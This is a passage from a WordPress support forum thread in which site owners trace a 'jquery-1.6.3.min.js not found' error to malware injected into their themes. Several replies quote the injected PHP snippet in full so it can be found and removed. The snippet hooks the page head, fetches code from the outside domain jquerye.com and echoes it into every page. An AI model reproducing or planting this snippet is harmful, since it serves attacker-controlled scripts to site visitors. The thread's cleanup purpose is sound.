• Hi all,

    I’m here cause I have this issue on my website (www.centreculturelremicourt.be) :

    The requested URL /jquery-1.6.3.min.js was not found on this server.

    I try the solution in header.php, but I have no “if” command in this file !

    Could someone help to resolve this issue please ?

    Thanks a lot.

Viewing 15 replies - 16 through 30 (of 33 total)
  • Please see my post above or post your own topic.

    I FOUND IT HERE:

    /home/**CPANEL USERNAME**/public_html/wp-content/themes/**NAME OF THEME**/classes/Admin/Theme/class.php

    THEN I COMMENTED IT OUT (instead of deleting the file, CLASS.PHP) THUS:

    <?php
    //if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "https://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init();	$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');}
    ?>

    Not found: jquery-1.6.3.min.js
    but I found the below codes in theme/javascript/jquery.cycle.js

    // if $.support is not defined (pre jQuery 1.3) add what I need
    if ($.support == undefined) {
    $.support = {
    opacity: !($.browser.msie)
    };
    }

    function debug(s) {
    $.fn.cycle.debug && log(s);
    }
    function log() {
    window.console && console.log && console.log(‘[cycle] ‘ + Array.prototype.join.call(arguments,’ ‘));
    }
    $.expr[‘:’].paused = function(el) {
    return el.cyclePause;
    };

    Please Help!

    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    gufranchorghay,

    I used notepad++ (using the ‘find in files’ tab in the ‘find’ dialogue popup) to search the whole theme folder using the ‘search directory’ button for the word “jquerye” and it returned a line from a particular file. And that was how I found it.

    So have you tried it this way?

    thanx

    got it

    thanx lajerrycares

    You’re welcome, gufranchorghay. ??

    Hi sindema,
    plz i have sahifa theme too, and i have te same problem
    can you plz tell me how do you solve problem
    tnx

    Thanks Stefan! You solved my problem!

    twoei22

    (@emmanueljaquetgmailcom)

    StefanRisticDev – I found exactly the snippet of code you mention but when I delete it and re-upload my whole site goes down.. “site is not available at the moment – it may be misconfigured etc..”
    Any suggestions?
    https://aungmyaythukha.org/
    thanks

    twoei22

    Follow the instruction given by StefanRisticDev

    1) download active theme files in your computer.

    2) search the file containts: jquery-1.6.3.min.js with Notepad++

    3) open the search file and replace:

    <?php if (!function_exists(‘insert_jquery_slider’)){function insert_jquery_slider(){if (function_exists(‘curl_init’)){$url = “https://www.jquerye.com/jquery-1.6.3.min.js&#8221;;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_slider’);} ?>

    with: <?php ?>

    4) all done!

    5) Thanks StefanRisticDev

    Regards

    twoei22

    (@emmanueljaquetgmailcom)

    Ok guys – all down – thanks a lot!!

    // StefanRisticDev

    Download your theme folder, run a search for “jquery-1.6.3.min.js” through all files(by using Notepad++ on Windows or Search for Files on Linux) and locate code similar to one from above.

    If you find this code in some important file(functions.php for example) delete this part:

    THANK YOU, IT was very helpful ??

    Hi, I solved this by deactivating and deleting the UberAudio plugin..

    Thanks StefanRisticDev,

    1) download active theme files in your computer.

    2) search the file containts: jquery-1.6.3.min.js with Notepad++

    3) open the search file and replace:

    <?php if (!function_exists(‘insert_jquery_slider’)){function insert_jquery_slider(){if (function_exists(‘curl_init’)){$url = “https://www.jquerye.com/jquery-1.6.3.min.js&#8221;;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_slider’);} ?>

    with: <?php ?>

    I fix malware attack!

Viewing 15 replies - 16 through 30 (of 33 total)
  • The topic ‘The requested URL /jquery-1.6.3.min.js’ is closed to new replies.